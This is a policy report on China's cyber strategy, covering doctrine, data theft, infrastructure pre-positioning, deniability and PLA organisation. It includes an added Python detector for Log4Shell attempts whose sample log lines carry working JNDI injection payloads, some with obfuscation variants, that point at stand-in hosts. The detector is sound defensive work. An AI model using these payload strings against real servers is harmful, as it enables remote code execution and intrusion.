Cyber War Playbook 3
A Playbook for Winning the Cyber War: Part 3: Evaluating China’s Cyber Strategy
Aosheng Pusztaszeri, et al. | 2025.09.04
China has emerged as a leader in the cyber domain, and its increasingly sophisticated cyber operations pose the preeminent threat to the United States and its allies.
Overview of China’s Cyber Playbook
“Efforts should be made to build our country into a network powerhouse.”
— Chinese President Xi Jinping, 2014 Central Network Security and Informatization Leading Small Group meeting
Chinese President Xi Jinping’s remarks at the 2014 Central Network Security and Informatization Leading Small Group meeting marked a new phase in the Chinese government’s approach to cyberspace. Beijing is making a determined effort to fully integrate cyber operations with its other military capabilities, with an end goal of excelling at a comprehensive, agile form of modern conflict. China views conditions of peace and war not as a dichotomy, with different rules governing each, but as a spectrum. What the United States and its allies refer to as strategic competition, China sees as akin to low-level warfare. That low-level war explicitly includes information operations, including computer network operations. China’s cyber tool kit is an extensive part of the arsenal, providing opportunities for a range of actions. Further, China’s view of what qualifies as appropriate targets means it is willing to use cyber tools against a variety of targets, including some which Western countries would see as out-of-bounds.
China’s offensive cyber operations are part of a larger, integrated concept of information warfare. That concept is embedded in its military, diplomatic, and economic strategy. In 1995, Major General Wang Pufeng, who is considered to be the father of Chinese information warfare, wrote, “Information war is a crucial stage of high-tech war. . . . At its heart are information technologies, fusing intelligence war, strategic war, electronic war, guided missile war, a war of ‘motorization’ (jidong zhan), a war of firepower (huoli)—a total war. It is a new type of warfare.” Chinese military scholars wrote in the 2017 Guofang Keji, a Chinese defense journal, about the integration of these efforts:
The physical level requires the realization of the vertical and horizontal connection and integration of various combat units and combat elements, unified command, unified control and unified coordination. The information level requires the controllability, sharing, and robustness of command information. The above-mentioned command and control capabilities play a decisive role in the control of cyberspace and the success or failure of operations, so they have become one of the core capabilities of cyberspace combat power construction.
People’s Liberation Army (PLA) planners envision cyber as a key part of a comprehensive, integrated strategy for the entire spectrum of modern warfare, from espionage to competition to conflict. Beijing seeks to collect intelligence; prepare the environment for cyberattacks; imperil a potential adversary’s command, control, and communications systems; disrupt commerce and critical infrastructure; and influence populations.
Like Moscow, Beijing views offensive cyber capability and information warfare as inextricably linked. Beijing’s 2015 Military Strategy extensively discusses the “informatisation of warfare” and says China will build an “informationised military” to win “future informationised wars.” China’s understanding of information operations combines military capabilities with cyber warfare, electromagnetic warfare, counterspace, propaganda, and denial and deception, which reflects a bent toward gaining an “information advantage” over its adversaries. Beijing views achieving this “information superiority” as an essential prerequisite for kinetic warfare, which is rooted in the belief of the Chinese Communist Party (CCP) that losing a major military operation could jeopardize the regime’s domestic legitimacy. Consequently, the CCP prioritizes securing “information superiority” before deploying military force to ensure conditions are fully prepared and success is “virtually guaranteed.” Beijing also sees data as a strategic asset and sees no boundary between industry intellectual property (IP) and state secrets: Both are fair game for espionage. Using tactics honed for internal surveillance, it has mined the rest of the world for useful data.
Beijing notably does not employ the term “cybersecurity” but rather uses “network security” (wangluo anquan), which includes the “use of information . . . to influence or control . . . an opponent’s decision-making activities” and can serve both “offensive and defensive” purposes. As a result, China’s concept of network security extends beyond the West’s narrower focus on protecting cyberspace from cyberattacks and encompasses broader national security concerns across economic, political, and social dimensions. This perspective continues to shape and inform much of China’s cyber strategy and playbook.
Chinese activity in the cyber domain is also characterized by exceedingly broad collection, typically for espionage and information gathering. According to CrowdStrike Intelligence, China-affiliated actors were the most active intrusion groups in 2022, targeting “nearly all 39 global industry sectors and 20 geographic regions.” While the primary focus was on organizations in the government and technology sectors across Asia (66 percent), organizations in Europe and North America were also heavily targeted, accounting for approximately 25 percent of Chinese intrusion activity. Africa, South America, and Oceania made up the remaining 9 percent. China-affiliated intrusion groups also rank among the most capable in exfiltrating massive amounts of personal data. According to an August 2021 U.S. Senate Select Committee on Intelligence hearing, China has hacked and stolen the personal data of about 80 percent of Americans since 2014. Further, over the past five years, U.S. government officials have identified Chinese hacking groups covertly embedding themselves into U.S. critical infrastructure. These actions, which “have no legitimate espionage value,” according to the Cybersecurity and Infrastructure Security Agency (CISA), strongly indicate that the groups’ ultimate objective is sabotage.
Beijing has used information warfare to deter what it views as the United States and its allies’ interference in its affairs. This approach manifests itself as both denial and compellence. To deny, Beijing enacts policies like the Great Firewall, locking down incoming information in order to prevent the United States from gaining a foothold. Meanwhile, it has sought to compel actors to align with China’s view or remain on the sidelines, largely through a combination of economic power and its vast army of cyber “trolls.” For instance, in October 2019, after Houston Rockets Manager Daryl Morey tweeted in support of the Hong Kong protests, China’s “troll mob” retaliated by posting 170,000 tweets criticizing Morey, while China’s state media temporarily suspended all National Basketball Association (NBA) broadcasts in the country. This resulted in hundreds of millions of dollars in lost NBA revenue and a rapid apology from Morey. Similarly, in 2021, Lithuania experienced a 91 percent drop in its exports to China after allowing Taiwan to open a representative office in Vilnius.
Despite rapidly developing its cyber capabilities over the past decade, China’s cyber ecosystem may still have underlying flaws. According to the International Institute for Strategic Studies (IISS), China’s intelligence analysis and dissemination capabilities remain “less mature” than those of the West. Furthermore, China’s intelligence analysis tends to be driven by ideology, often “enmeshed with questions of prestige around the political goals of the CCP leaders,” making it more vulnerable to political influence, intrigue, scandals, and corruption purges. For instance, the PLA’s Strategic Support Force (SSF), which housed China’s Cyber Department, was completely restructured after eight short years, likely due to corruption concerns among SSF leadership. Certain secretive PLA cyber groups have been detected—and exposed—by private U.S. companies, leading to fierce denials from Beijing. For instance, on February 19, 2013, cybersecurity firm Mandiant uncovered and exposed the highly secretive PLA cyber espionage group Comment Panda (also known as PLA Unit 61398) by reportedly exploiting significant vulnerabilities in the group’s network.
Core Elements of China’s Strategy
“Without cybersecurity, there is no national security; without informatization, there is no modernization. Cybersecurity and informatization are two wings of one body and two wheels of one drive.”
— China’s 2016 National Cyber Strategy
While Beijing has released little in the way of an official explanation of its cyber playbook, a combination of scholarly writings by individuals associated with the military and a careful analysis of China’s uncovered cyber operations provide a rough map of Chinese theory and practice in this domain. Still, any observer of Chinese activity must keep in mind that theory can look good on paper while implementation falls short. Although this is true everywhere, it is particularly pronounced in authoritarian societies, where good news is reported and bad news is silenced. This section of the report describes what China has officially said about its approach to cyber, and the next section examines how China applies these concepts in practice.
“World-Class” Cyber as a Core Mission
Beijing first acknowledged the critical role of the cyber domain in conflict in a 2013 Academy of Military Science’s publication, The Science of Military Strategy. In the ensuing 12 years, the PLA has built out its offensive and defensive cyber capabilities, including as part of a massive reorganization of its military forces. Its original goal was to create a strategically valuable cyber capability by 2020, but as of 2019, China described its cyber capabilities as “commensurate with its status as a major cyber country developing into a cyber power.”
Similarly, China’s 2015 Military Strategy called computer network operations a “new pillar of economic and social development” and a “new domain of national security.” It further laid out a clear goal to “expedite the development of a cyber force, and enhance its capabilities of cyberspace situation awareness, cyber defense, [and] support for the country’s endeavors in cyberspace.” China also aims to become a world-leading cyber power by 2035. To achieve this goal, it intends to heavily focus on the “informatization” of warfare, and strengthen its cyber situational awareness and defense capabilities in order to “stem major cyber crises, ensure national network and information security, and maintain national security and social stability,” according to its 2015 Military Strategy.
Further, according to a 2020 U.S. Department of Defense (DOD) report, China is also increasingly prioritizing an “intelligentized” approach to warfare, which focuses on developing emerging technologies such as artificial intelligence (AI), cloud and quantum computing, and unmanned systems to target and degrade adversaries’ systems. In short, China believes its cyber goals are intertwined with “social stability” and that only by building an “informatized” and “intelligentized” military will it be able to meet its cyber objectives and “win future ‘informatized’ wars.”
Highly Motivated for Success
Part of the motivation for China’s efforts in the cyber domain is a desire to maintain stability and control over its domestic population. The 2017 National Cyber Strategy says that:
Political stability is the basic prerequisite for national development and people’s happiness. The use of the network to interfere in [China’s] internal affairs, attack [its] political system, incite social unrest, and [conduct] large-scale network monitoring, network theft and other activities seriously endanger the national political security and user information security.
According to the IISS, China’s primary strategic objective in cyberspace has been to control domestic thought, specifically by preventing the online spread of Western ideas. Drawing from the 2003 UN concept of “cyber sovereignty,” which calls on states to exert control over their own portion of the internet, China developed its “Golden Shield Project”—an internal surveillance and censorship system that evolved into what is now known as the “Great Firewall of China.” Further, witnessing the growing role of social media in sparking social unrest—notably the 2009 Iran protests, 2010 Arab Spring, and 2011 England riots—caused the CCP to intensify its monitoring of domestic internet activity. Today, Chinese surveillance efforts remain focused on domestic control, with its Ministry of Public Security (MPS) operating what is considered to be the largest surveillance system in the world.
This view of domestic technological innovation as a national security priority may help explain certain state-sponsored cyberattacks on foreign technology companies aimed at stealing IP. For example, in 2016, the China-affiliated threat group Stone Panda stole “hundreds of gigabytes” of sensitive data from companies in aviation, space, communications, advanced manufacturing, maritime technology, and oil and gas—all core sectors outlined in the CCP’s Made in China 2025 plan to boost the country’s technology industry and reduce its reliance on U.S. companies. On paper, China has set the ambitious goal of ensuring that 70 percent of its core internet technology is domestically produced by 2025.
Further, China’s cyber legislation and regulations are intentionally designed to enhance and refine the country’s cyber capabilities. For example, the 2021 Regulations on the Management of Network Product Security Vulnerabilities, drafted by the Cyberspace Administration of China (CAC), the MPS, and the Ministry of Industry and Information Technology (MIIT), “require companies doing business in China to report software vulnerabilities in their products or products they use to the MIIT within forty-eight hours of discovery,” according to an Atlantic Council report. This regulation, coupled with state-sponsored student hacking competitions (such as the TOPSEC Cup), provides China’s security services with a “steady stream of vulnerabilities to exploit for state-sponsored operations,” according to a 2022 report by the U.S.-China Economic and Security Review Commission (USCC).
China’s concept of network security encompasses political dimensions, which may explain why the CCP views commercial communication networks and information technology (IT) standards as tools to strengthen its influence and project power abroad. Consequently, China sees competition with the West over IT architectures as a zero-sum game.
How Cyber Strategy Fits into Foreign Policy
China, like Russia and the United States, portrays its efforts as entirely defensive. The 2013 Defense White Paper and 2015 Military Strategy note that China would not attack unless attacked first, but “we will surely counterattack if attacked.” This strategy, known as “Active Defense,” aims “to enhance defense capabilities in order to survive and counter after suffering an offensive cyber strike.” As a retired PLA colonel, citing an active-duty PLA colonel, put it in 2019: “After the first round of a cyberattack, the targeted side can respond with a precise counterattack as long as it has a strong defense. The attacker will then suffer unfavorable outcomes if its defense is not good enough. From this perspective, it is wiser to make efforts in building up a strong defense.” Furthermore, China’s National Cyber Strategy asserts that China is prepared to “take all measures, including economic, administrative, scientific and technological, legal, diplomatic, [and] military” to “protect . . . [its] information facilities” and “safeguard [its] cyberspace sovereignty.”
China sees cyber as a lawless space with weak international norms. Sovereignty is a particularly fluid concept: While Beijing insists on absolute authority within its own borders, it also aggressively operates within the physical and cyber borders of other nations. A government official from a U.S. ally summed up this approach as “there is an area of me you can’t attack and areas of you that I can.” Put differently, Beijing views China’s internal internet as its own sovereign territory and other countries’ internet as its hunting grounds. Just as China sees heavy censorship as completely acceptable, it also sees civilian suffering at a low level as justified to accomplish larger goals. Media manipulation, power disruption, point-of-sale manipulation, and disruption of communications are all legitimate actions to accomplish the state’s goal. Further, attacks on civilian infrastructure, like power grids, are also a part of the plan to deter or coerce the United States and its allies.
Ke Hongfa, Zhu Jilu, and Zhao Rong in Guofang Keji describe two types of attacks: “information utilization” also known as “soft kill” attacks like influence campaigns; and “high-precision physical destruction of hardware,” such as IT infrastructure. These two forms of attack have the benefit of “remote control, flexible maneuverability, strong destructive power, and small collateral damage.” This simple taxonomy of attacks sheds light on what China values in cyber warfare—the ability to destroy hardware or manipulate information from afar, with little risk.
At the time of writing, Beijing has largely focused its cyber efforts on the first type of attack: espionage and information utilization. These efforts can also be split into two main lines: (1) theft of data, and (2) research on the setup of a network for potential exploitation later. In the first instance, stealing research and development (R&D), state secrets, or personal data can advance Chinese political or economic interests. In the second, operational preparation of the environment (OPE), or establishing the knowledge of networks and footholds, is necessary to execute later operations, including destructive ones. Writing in Guofang Keji, Ke, Zhu, and Zhao describe these reconnaissance operations:
Cyberspace reconnaissance operations are mission behaviors to obtain information about opponents or potential opponents’ cyberspace operations and network resources. The network information of reconnaissance is the prerequisite basis for all cyber combat operations and can also be used to verify current intelligence or predictions.
“Information Utilization” or “Soft Kill” Attacks
While China views information operations—such as propaganda and cyber operations—as existing along a spectrum of information warfare, this project draws a clear, bright line between the two and focuses nearly exclusively on the latter: computer network operations designed to move or change data, not minds. While modern information operations use computers as a delivery mechanism for their substantive payload, the 1s and 0s are incidental to the operation; in contrast, in cyber operations the 1s and 0s themselves are the payload. Changing minds can be among the most powerful of weapons, but the methods and future in that space are different from those of cyber warfare. This report is scoped solely to examine operations intended to produce an outcome in the physical world.
Still, these arenas occasionally overlap. Australian officials have highlighted Chinese efforts to undermine computer security training with Pacific Island nations by engaging in a smear campaign against U.S. and Australian capabilities. For example, Beijing’s diplomats will say that the United States has no proof that China engages in offensive cyber activity, then make the counteraccusation that Google, Microsoft, and others are really tools of the U.S. government and that those companies are the ones planting dangerous back doors. Hacks and leaks can also be a combination of the two tool sets—computer network operations to obtain the data, then a leak strategy designed to maximize the effect on minds.
According to the Office of the Director of National Intelligence (ODNI), China is also increasingly using information operations to undermine U.S. global leadership and democracy and expand Beijing’s influence. These efforts primarily focus on promoting pro-China narratives and countering foreign policies that threaten “China’s international image, access to markets, and technological expertise.” This is especially evident when China views the issues as matters of internal sovereignty, such as those involving Hong Kong, Taiwan, Tibet, and Xinjiang. China is continually refining its influence operations, even experimenting with generative AI to run fake TikTok accounts. These accounts, made by the CCP-affiliated threat actor “Spamouflage,” spread divisive content on social media to sow division among U.S. voters. According to ODNI, China’s recent efforts to exploit perceived societal divisions in the United States increasingly resemble Moscow’s approach to influence operations.
SOFT KILL: DATA THEFT
Unlike Moscow, China stands out in its approach to collecting vast quantities of data. One reason for Beijing’s focus on data theft is almost certainly in part to train its artificial intelligence/machine learning (AI/ML) systems. A 2021 DOD report highlighted this approach, stating that the PLA explicitly called out big data as “useful for monitoring and early warning.” Further, AI is “a tool for more realistic exercises and the ability to respond quickly in the case of a conflict in cyberspace.”
China also engages in extensive industrial cyber espionage, exfiltrating vast amounts of private sector information, trade secrets, R&D data, and products. According to the U.S. Department of Justice (DOJ), “more than 90 percent of [its] cases alleging economic espionage . . . involv[ed] China.” In an October 2014 interview, then-Federal Bureau of Investigation (FBI) Director James Comey estimated that Chinese cybercrime costs the U.S. economy “billions” of dollars every year. The USCC estimates the figure to be closer to “tens of billions of dollars” every year.
China’s intelligence collection against the United States has been comprehensive:
- In early 2014, Chinese actors hacked the health insurance company Anthem, exfiltrating an estimated 78 million member names, birth dates, and phone and Social Security numbers.
- Beijing hacked the Office of Personnel Management (OPM) in 2014 and stole 21.5 million records, including background check data and employee fingerprints.
- In 2017, Beijing hacked credit reporting agency Equifax and stole the credit data of 147.9 million Americans.
- Between 2014 and 2018, Beijing hacked Starwood Hotels’ reservation system and stole credit card and passport information from approximately 500 million people.
With this combination of data, China could identify U.S. government employees with security clearances who had financial or health problems, trace where they are about to travel, and create opportunities for Chinese intelligence agents to make an approach (a “bump”). In addition to this kind of tactical use, data at scale is a strategic asset—whether to train AI/ML models or to develop knowledge that could inform an influence campaign.
HARD KILL: “HIGH-PRECISION PHYSICAL DESTRUCTION OF HARDWARE”
The second type of attack Ke, Zhu, and Zhao describe in Guofang Keji is “hard kill,” or high-precision destruction. Russia and Iran have both executed this type of cyberattack in recent years—for example, Russia took Ukraine’s power grid offline in 2015 and again in 2022, while Iran destroyed thousands of computers belonging to Aramco, the Saudi state-owned oil company, in 2012. China has not yet executed such an attack, but it has pre-positioned assets to do so when deemed necessary.
The theory behind this kind of attack is to create disruption, confusion, and disarray during a crisis. The aggressor simply needs to identify pain points in the target’s logistical operations and make everything just a little bit harder, slowing or temporarily halting effective functioning. If the target country cannot move people, fuel, and materiel, it cannot effectively fight. For example, if China were able to disrupt transport around military bases—such as train signals, port equipment, or electricity—it could likely slow deployment of U.S. forces for hours, if not days. In the case of a Taiwan contingency, a 24-hour deployment delay might be enough to allow the PLA to gain a foothold on the island before the United States could effectively assist. One member of an allied military noted that it might be as simple as changing the barcodes on shipping containers in a military warehouse or shuffling the data in an Excel spreadsheet managing deployments. If mufflers, rather than munitions, are loaded onto the ship, that vessel’s effectiveness is greatly diminished. Another allied official said a military must be able to “move, feed, and power” soldiers—illustrating the targets of Chinese operations.
Beijing could also cause disruption by targeting critical infrastructure, which governments define as items necessary for the functioning of daily life. Critical infrastructure, however, is generally considered off-limits to military activity. Targeting civilian critical infrastructure is illegal under the Law of Armed Conflict because of the potential for mass casualties and the high likelihood of civilian suffering if, for example, a water treatment plant were taken offline for days. However, what constitutes critical infrastructure is often in the eye of the victim, and China has demonstrated a willingness to penetrate water, power, and fuel systems within the United States. Australia, too, saw an uptick in attacks on critical infrastructure systems from 2022 to 2023. New requirements in Australia make reporting breaches of critical infrastructure systems mandatory, which will lead to better data on the trend lines of the problem and more comprehensive awareness of the problem’s scope.
Beijing’s efforts against critical infrastructure are not new. In July 2021, the U.S. Department of Homeland Security issued a threat alert on Chinese penetrations of natural gas pipelines, citing efforts dating back to 2011. The alert disclosed that suspected Chinese hackers had gained access to the controls of several U.S. natural gas pipeline companies. Ominously, it also stated that these penetration strategies “remain relevant” today. At the time, a Mandiant researcher asserted that the goal of the attack was likely economic espionage: “We have seen little evidence over the past 10 years of [Chinese] cyber operations targeting critical infrastructure with the end goal of disruption or destruction, but we do not discount the possibility that they may do so in future conflict scenarios, such as in the event of war.”
The Mandiant researcher was wrong, but the latter half of the comment was prescient: Since 2011, China-affiliated actors—most notably Volt Typhoon—have embedded themselves in the networks of “aviation, rail, mass transit, highway, maritime, pipeline, water, and sewage organizations” in the mainland United States. Indeed, the researcher went on to say that Mandiant had recorded “multiple threat actors linked to China” targeting industrial control system (ICS) operators and natural gas pipeline companies, an energy company, and an ICS equipment manufacturer and security firm. While this activity may have yielded some economic benefit, it now appears far more likely that the Chinese attackers were conducting reconnaissance for future operations, such as OPE.
In Australia, cyberattacks may be redundant. Canberra has discovered that China may have established a more direct route: A large percentage of critical infrastructure is already Chinese-owned. For instance, Hong Kong–based CKI controls 51 percent of the South Australia Power Network and a majority share of gas transmission and distribution pipelines—68 percent in Victoria, 86 percent in South Australia, and 72 percent in Queensland. A New South Wales group recently intervened to prevent a Chinese company from buying additional power generation and distribution capacity. Australia is hardly alone; China has also sought contracts to build critical infrastructure—including power and transportation systems—around newly constructed national capitals in Egypt and Indonesia.
The 2024 Annual Threat Assessment from the U.S. Intelligence Community (IC) and the Australian Signals Directorate (ASD) both note an increase in Chinese operations targeting critical infrastructure. The IC reports that U.S. private sector entities have found that Chinese cyber operations probably intend to “pre-position cyber attacks against infrastructure in Guam and to enable disrupting communications between the United States and Asia,” as well as “deter U.S. military action by impeding U.S. decisionmaking, inducing societal panic, and interfering with the deployment of U.S. forces” in the event of a conflict. Similarly, ASD reports that cyber incidents at the second-highest level (Category 2) “rose from 2 in Fiscal Year (FY) 2021–22 to 5 in FY 2022–23.” (Canberra’s report does not name either the perpetrator or the target specifically, but government officials in interviews indicated China’s responsibility for at least some attacks.)
How China Approaches Deniability
China’s activities in cyberspace include opportunistic campaigns conducted by patriotic hackers and hacktivists, which create highly visible effects while offering Beijing plausible deniability, as well as operations affiliated with the PLA and Ministry of State Security (MSS), which are intended to remain clandestine while enabling long-dwell espionage or pre-positioning for future attacks. Some actors cross these categories, with certain proxies maintaining loose or close affiliations with the Chinese government.
The first category comprises high-profile hacktivist campaigns aimed primarily at responding to perceived slights against China. For example, in 1999, “patriotic hackers” defaced U.S. government websites in retaliation for the accidental U.S. bombing of the Chinese embassy in Belgrade, Serbia. This category also includes high-profile cyberattacks on Taiwan, often in response to a specific event. For instance, just before then-U.S. Speaker of the House Nancy Pelosi’s visit to Taiwan in August 2022, Chinese hacktivists launched multiple distributed denial-of-service (DDoS) attacks against Taiwanese government websites.
China also leverages its vast and opaque network of PLA- and MSS-affiliated threat groups to carry out more sophisticated cyberattacks while maintaining a level of plausible deniability. These operations are often carried out by “a collection of Chinese state-sponsored intelligence officers, contract hackers, and support staff” that operate out of PLA- or MSS-affiliated front companies and receive varying levels of government support. Furthermore, the central MSS body in Beijing delegates considerable authority to its provincial branches and exercises varying degrees of control over these groups, making it difficult for policymakers to determine the central government’s true degree of involvement and calculate an appropriate response. According to Alex Joske, a consultant at McGrathNicol, this partially explains why “no cyber-attacks have been publicly attributed to the central MSS” in Beijing, whereas many have been linked to advanced persistent threats (APTs) affiliated with MSS regional bodies at the provincial or municipal level.
Beijing has also engaged in sophisticated, long-term clandestine campaigns. These operations typically focus on espionage—either establishing a sustained, covert presence to gather intelligence or creating an infiltration that could be weaponized later. For example, the threat actor Volt Typhoon operated undetected for at least five years within the systems of U.S. aviation, rail, and water organizations, according to the FBI, National Security Agency, and CISA.
Implementation: Campaigns or Opportunism
China’s path from opportunism to campaigns to thoroughly integrating cyber domain operations into its warfighting strategy has been reasonably linear. Its early cyber operations were attributed to a loose collection of private “patriotic hackers.” Over the next 15 years, the number of actors and the spread of activity expanded dramatically until the 2015 reorganization and consolidation of cyber operations, which coincided with the broader PLA restructuring. This unified approach has resulted in more targeted cyber activity, with campaign targets aligning largely with China’s five-year plans.
Cyber campaigns are inherently challenging because of the difficulties of timing and coordination. As a result, cyberattack operations often combine deliberate targeting with opportunism, that is, exploiting newly disclosed or still-unpatched vulnerabilities wherever they happen to appear. For example, the China-affiliated threat group Wicked Panda exploited a zero-day vulnerability in the USAHerds application (CVE-2021-44207) and, within hours of its public disclosure, the Log4Shell vulnerability in the Log4j logging library (CVE-2021-44228). This quiet but effective operation ran from May 2021 to February 2022 and compromised at least six unidentified U.S. state government networks.
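The Log4j case above is a good illustration of why "opportunistic" exploitation is hard to catch with naive string matching. The following is an added example written for this page (it is not code from the report or from any named vendor): a small detector that scans web-server access lines for CVE-2021-44228 lookup strings. It URL-decodes each line and collapses the nested `${lower:…}`, `${upper:…}` and `${…:-default}` lookups that attackers used to hide the literal `jndi:` prefix, then flags the normalised result. The log lines, IP addresses and targets are constructed for the example; the `:-` default-value handling reflects how Log4j 2's string substitution behaves when a lookup is undefined. A hit means an exploitation attempt was logged, not that the server was vulnerable or compromised.

```python
"""Detect CVE-2021-44228 (Log4Shell) exploitation attempts in access logs.

Added example, not from the original report. All log lines are constructed.
"""
import re
import urllib.parse

# Constructed sample lines (Apache-style). Lines 2-5 carry payloads with the
# evasions seen in the wild; line 6 contains the word "jndi" innocently.
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Dec/2021:21:01:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:21:02:03 +0000] "GET /login HTTP/1.1" 200 311 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:21:02:09 +0000] "GET /api HTTP/1.1" 200 90 "-" '
    '"${${lower:j}ndi:${lower:l}${lower:d}ap://198.51.100.7:1389/b}"',
    '198.51.100.8 - - [10/Dec/2021:21:03:44 +0000] '
    '"GET /?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.8%3A1099%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.9 - - [10/Dec/2021:21:04:00 +0000] "GET /x HTTP/1.1" 200 10 "-" '
    '"${${env:NaN:-j}ndi:${::-l}dap://198.51.100.9/d}"',
    '203.0.113.6 - - [10/Dec/2021:21:05:00 +0000] "GET /docs/jndi-overview.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

# Innermost ${...} lookup: a body containing no further '$', '{' or '}'.
INNER = re.compile(r"\$\{([^${}]*)\}")

# A resolved JNDI lookup. Log4j lower-cases the lookup prefix, so "JnDi:" works too.
JNDI = re.compile(r"\$\{\s*jndi:\s*([a-z]+)://([^}]*)\}", re.IGNORECASE)


def _resolve_inner(m: re.Match) -> str:
    """Evaluate one innermost lookup the way an attacker expects Log4j to."""
    body = m.group(1)
    if body.lower().startswith("jndi:"):
        return m.group(0)               # the lookup we are hunting: keep it
    if ":-" in body:                    # ${anything:-default} -> "default"
        return body.split(":-", 1)[1]   # e.g. ${::-j} -> "j", ${env:NaN:-j} -> "j"
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    return m.group(0)                   # unknown lookup: leave unchanged


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode and collapse nested lookups until the string stops changing."""
    for _ in range(max_rounds):
        folded = INNER.sub(_resolve_inner, urllib.parse.unquote(text))
        if folded == text:
            return text
        text = folded
    return text


def find_log4shell(lines):
    """Return one record per JNDI lookup found, after normalisation."""
    hits = []
    for n, line in enumerate(lines, 1):
        for m in JNDI.finditer(normalize(line)):
            hits.append({
                "line": n,
                "source": line.split()[0],          # client IP, first field
                "scheme": m.group(1).lower(),       # ldap, rmi, dns, ...
                "target": m.group(2),               # attacker host/path
            })
    return hits


if __name__ == "__main__":
    for h in find_log4shell(SAMPLE_LOGS):
        print(f"line {h['line']}: {h['source']} -> {h['scheme']}://{h['target']}")
```

Because the payload can arrive in any field that ends up in a log statement (User-Agent, query string, X-Forwarded-For, a username), the detector scans the whole line rather than one field. Matching on the resolved `${jndi:` form rather than the substring "jndi" is what avoids the false positive on line 6 while still catching the double-encoded and nested variants.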
China’s Vulnerabilities
Creating pre-positioned tools to deploy at a moment’s notice in case of a contingency looks good on paper, but translating a script into reality on the battlefield is far harder. As the adage goes, no battle plan survives first contact with the enemy. China has not fought a shooting war since 1979, and many of its cyber operations remain more theoretical than practical. While they can still be highly disruptive, orchestrating the right sequence of dominoes to fall at the precise moments to fit perfectly with a larger battle plan remains difficult. As an allied interviewee put it, “China thinks it can leverage a large number of effects simultaneously around the globe. They like to follow a script, and they don’t think about the flexibility in planning that is so critical for cyberattacks.”
One way to manage a highly scripted operation is through extensive testing. A cyber range can be useful, but like any controlled environment, it is inherently artificial. Testing on a live target is the most effective way to gauge the impact of a cyberattack, but this approach is brazen and generally only used by Russia and North Korea. Moreover, it risks alerting the target, prompting patching and improved defenses that render the tool obsolete. For example, Beijing might consider testing tools on the Philippines before deploying them against the United States, but Philippine systems are likely to be quite different, to the point of not being a useful comparison. On the other hand, testing tools in environments where detection is less likely could be advantageous.
China heavily relies on foreign vendors for core network technologies, including essential U.S. software and hardware. For instance, it often refers to the “eight King Kongs” (bada jingang) when discussing the largest internet companies in its domestic supply chain: Apple, Cisco, Google, IBM, Intel, Microsoft, Oracle, and Qualcomm. China has long regarded its reliance on this small number of companies to be a national security risk. This concern is amplified by China’s state-run media, which often portrays these U.S. companies as proxies for the U.S. government. Many Chinese experts also hold the mistaken belief that, as in China, the U.S. government wields significant influence over U.S. companies, and that “the United States [government] can disrupt or corrupt the functioning of any device with U.S.-made software.”
Cyber War on Taiwan?
Pairing cyber operations with a potential amphibious assault on Taiwan would be extremely high risk but also high reward. According to the Australian Cyber Security Centre (ACSC), in a Taiwan contingency, China would need to cross Taiwanese airspace uncontested. One way to achieve this would be to use cyber tools to disable operations at Taiwan’s airfields and air defenses, allowing China to land on intact airfields. This could help China establish air superiority, funnel supplies, and deploy small contingents of ground troops in preparation for a larger amphibious assault. However, if these cyber operations fail to sufficiently degrade Taiwan’s air defenses, China risks significant losses in aircraft, personnel, and equipment—along with a serious blow to morale and prestige.
In parallel, China could launch cyberattacks on U.S. systems as part of its invasion strategy. It is already embedding itself in U.S. critical infrastructure, and if Beijing manages to compromise and sabotage key systems supporting U.S. military bases—such as power grids or water treatment facilities in the Philippines, Guam, or Hawaii—it could time these disruptions with its blockade of Taiwan. Even a 24-hour delay in the U.S. response could tip the balance in China’s favor and secure its control over the island. However, if these cyber operations fail or prove insufficient, and the United States is able to send enough aid to Taiwan in time, the situation could quickly escalate into a direct military conflict between the world’s two most powerful countries.
Organizational Capabilities
Who Are the Fighters?
China’s efforts in the cyber realm began much like those of other nations, with volunteer or patriotic hackers experimenting in a private capacity. As the Chinese government recognized the potential of this domain, it gradually developed an in-house cadre of hackers. In recent years, China has pursued a strategy of military-civil fusion, including in the cyber domain, which a 2021 DOD study found attempts to “increase the proportion of private companies that contribute to military projects and procurements.” These enterprises include “technology companies that specialize in unmanned systems, robotics, artificial intelligence, cybersecurity, and big data.” The resulting Chinese ecosystem of cyber actors is diverse and capitalizes on the strengths of military, civilian, and ostensibly nongovernmental organizations.
Inside the government, Beijing has gone through multiple iterations of organizing itself for cyber activity, much like every other sophisticated actor. However, Beijing has made large, sweeping changes several times, likely with the aim of creating smoother integration between cyber activity and other military and intelligence operations. China completely revamped its cyber structure between 2015 and 2018. Prior to 2015, the PLA, Technical Reconnaissance Bureaus, and MSS all conducted cyber operations. A military reorganization in 2015 was intended to bring peripheral activity under far tighter state control, while a 2018 civilian reorganization did the same. Another reorganization in 2024, meanwhile, was likely part of an anti-corruption push by President Xi. This section of the report reviews the current organization of China’s cyber forces, including the 2024 reorganization, as well as previous iterations.
Military
THE PLA’S STRATEGIC SUPPORT FORCE (SSF): MADE AND UNMADE
In 2015, apparently seeking to bring more discipline and order to Chinese efforts, Xi ordered a restructuring of China’s cyber and information warfare capabilities. With the new structure, the SSF centralized military elements of warfare in the cyber domain, including electronic, information, and psychological warfare. The new group became a full service alongside the PLA Army, Navy, Air Force, Rocket Force, and Joint Logistics Support Force. Several departments were placed under the new SSF, including the Aerospace Systems Department, the Electronic and Electromagnetic Systems Department, and, central to this discussion, the Network Systems Department. At the time, the SSF appeared to be firmly in charge of coordinated Chinese efforts in the cyber domain. But less than a decade later, the PLA effectively disbanded the SSF. The reasons for this shift are unclear from the outside, but theories include an anti-corruption push, a recognition that the leaders of this new organization had too much power, or a reorganization aimed at further streamlining support functions.
